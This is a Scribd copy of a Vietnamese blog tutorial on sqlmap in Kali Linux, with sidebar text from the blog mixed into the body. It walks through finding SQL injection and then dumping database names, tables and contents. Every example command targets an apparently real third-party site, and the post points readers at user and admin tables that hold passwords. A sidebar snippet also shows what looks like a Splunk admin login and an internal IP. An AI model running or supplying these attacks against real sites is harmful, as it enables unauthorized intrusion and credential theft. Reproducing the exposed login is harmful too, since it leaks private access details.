Scribd Logo
Upload

Welcome to Scribd!

  • Hướng dẫn sử dụng sqlmap trong kali linux - THU DINH

    Uploaded by

    Trần Thanh Tùng
    36 views2 pages

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    36 views2 pages

    Hướng dẫn sử dụng sqlmap trong kali linux - THU DINH

    Uploaded by

    Trần Thanh Tùng

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    8/15/2020 Hướng dẫn sử dụng sqlmap trong kali linux - THU DINH

         Search

    THU INH HOME FIREWALL SYSTEM SECURITY NETWORK LOGS VIDE

    OTHERS
    "Trên con đường thành công, Không có dấu chân của kẻ lười biếng" --- Lỗ Tấn ---

    ABOUT ME
    Hướng dẫn sử dụng sqlmap trong Đinh Văn Thụ

    kali linux Network and Security

    POSTED BY : ON October 05, 2017

    FOLLOW BY EMAIL

    Email address... Subm

    Đầu tiên các bạn quét website xem có lỗi hay không. Với mình thì công cụ acunetix là công cụ
    quét lỗi bảo mật trang web tốt nhất hiện nay. Nếu có lỗi sql injection thì xác định lỗi ở thông số
    nào và có thể kiểm tra bằng cách vào trình duyệt gõ thêm ' vào cuối. Nếu trang web đó không
    hiện được hình ảnh thì bị lỗi sql injection và chúng ta có thể khai thác bằng công cụ sqlmap trong POPULAR RECENT
    kali linux.

    Ví dụ: Brute Forcing Passwords with


    Url bình thường: http://dacphuc.vn/?php=product_detail&id=227 THC-Hydra
    Các bạn có thể kiểm tra bằng cách thêm dấu ' vào cuối:
    http://dacphuc.vn/?php=product_detail&id=227' What is THC-Hydra? Hydra is a
    very fast online password cracking tool, wh
    Các bạn mở terminal và gõ lệnh: can perform rapid dictionary attacks agains
    sqlmap -h
    more than 50 ...
    để xem các tùy chọn của sqlmap

    + Bước 1: Xuất ra tên của cơ sở dữ liệu: DVWA SQL Injection (low leve
    sqlmap -u urltarget --dbs Bài này sẽ sử dụng 2 cách để kh
    Ở đây tùy chọn -u là url của mục tiêu.
    thác:   1. dùng tool sqlmap (nếu
    --dbs là xuất ra tên cơ sở dữ liệu.
    chưa biết, các bạn xem tại đây:  huong-dan-
    Ví dụ: sqlmap -u http://dacphuc.vn/?php=product_detail&id=227 --dbs
    + Bước 2: Khi đã có tên cơ sở dữ liệu, chúng ta có thể xem tên các bảng có trong cơ sở dữ liệu su-dung-sqlmap-trong-kali.ht...
    đó bằng lệnh như sau:
    sqlmap -u urltarget -D databasename --tables Basic command on router
    -D: là tên của database juniper (Lệnh cơ bản Juniper)
    --tables: để đưa ra tên của các bảng có trong cơ sở dữ liệu
    Ví dụ: sqlmap -u http://dacphuc.vn/?php=product_detail&id=227 -D databasename --tables           1.       Entering con guratio
    + Bước 3: Xem nội dung của các bảng trong cơ sở dữ liệu: mode on a Router, and exit          
    sqlmap -u urltarget -D databasename -T tablename --dump  user@R1>con gure            [edit]            use.
    -T: Đưa ra các bảng cần xem thông tin
    --dump: dump ra để xem cơ sở dữ liệu của bảng đó.
    Hướng dẫn sử dụng sqlmap
    Ngoài ra các bạn có thể thêm một số tùy chọn như sau:
    trong kali linux
    -C: Danh sách các trường cần xem.
    --table: cấu trúc của bảng về kiểu dữ liệu. Đầu tiên các bạn quét website
    Như vậy các bạn đã có thể xem được cơ sở dữ liệu trong trang web bị lỗi sql injection. Những xem có lỗi hay không. Với mình thì công cụ
    thông tin mà chúng ta thường khai thác như bảng liên quan đến user, admin, member. Những
    acunetix là công cụ quét lỗi bảo mật trang
    bảng này có thông tin về tài khoản và mật khẩu. Sẽ rất nguy hiểm nếu lưu không được mã hóa
    và bị hacker chiếm được những thông tin này. web tốt nhất hiệ...

    TMSH command on F5 LTM


    Help is available on the followin
    topics General:   glob                   
          
    regex                        tmsh   grep                     ..

    How to install F5 on VMware


    1. Cài đặt giả lập - Link down:
    https://downloads.f5.com/esd/e
    .sv?sw=BIG-IP&pro=big-
    ip_v11.x&ver=11.3.0&container=Virtual-E...
    thudinh        
    Network and Security How to install Splunk on cento
    ( Hướng dẫn cài đặt splunk trê
    centos)

    https://thudinh.blogspot.com/2017/10/huong-dan-su-dung-sqlmap-trong-kali.html 1/2
    8/15/2020 Hướng dẫn sử dụng sqlmap trong kali linux - THU DINH
    - cài trên logs.thudv.com - ip: 192.168.22.2
                    - login vào splunk = web:
    admin/chip@102                 - Để download
    spl...

    How to remote desktop kali


    linux on window
    Fist: apt-get update && apt-get
    upgrade apt-get dist-upgrade apt-get instal
    xrdp vnc4server tightvncserver service xrdp
    start Se...

    Ossec: Khái niệm và cài đặt


    No comments: Ossec trên Centos
    1. Lý thuyết             - là HIDS , mã
    Post a Comment
    nguồn mở.             - Quản lý log tập trung,
    theo thời gian thực, phân tích log truy cập.  

    SQL Injection Tutorials


    Bài 1: Khái niệm và kiến thức cầ
    biết: 1. Khái niệm:  SQL Injection
    một trong những kiểu hack web đang dần t
    nên phổ biến hiện n...

    CLOUD NUMBERED LABELS

    ASA CEH Checkpoint Cisco

    DVWA F5 big-ip Giao thức HTTP

    Hardening IDS_IPS Juniper Linux

    Logs SQL SRX tool VPN

    TOTAL PAGEVIEWS

    ADS 300 X 250

    Copyright © THU DINH.


    DINH. Created By

    https://thudinh.blogspot.com/2017/10/huong-dan-su-dung-sqlmap-trong-kali.html 2/2

    You might also like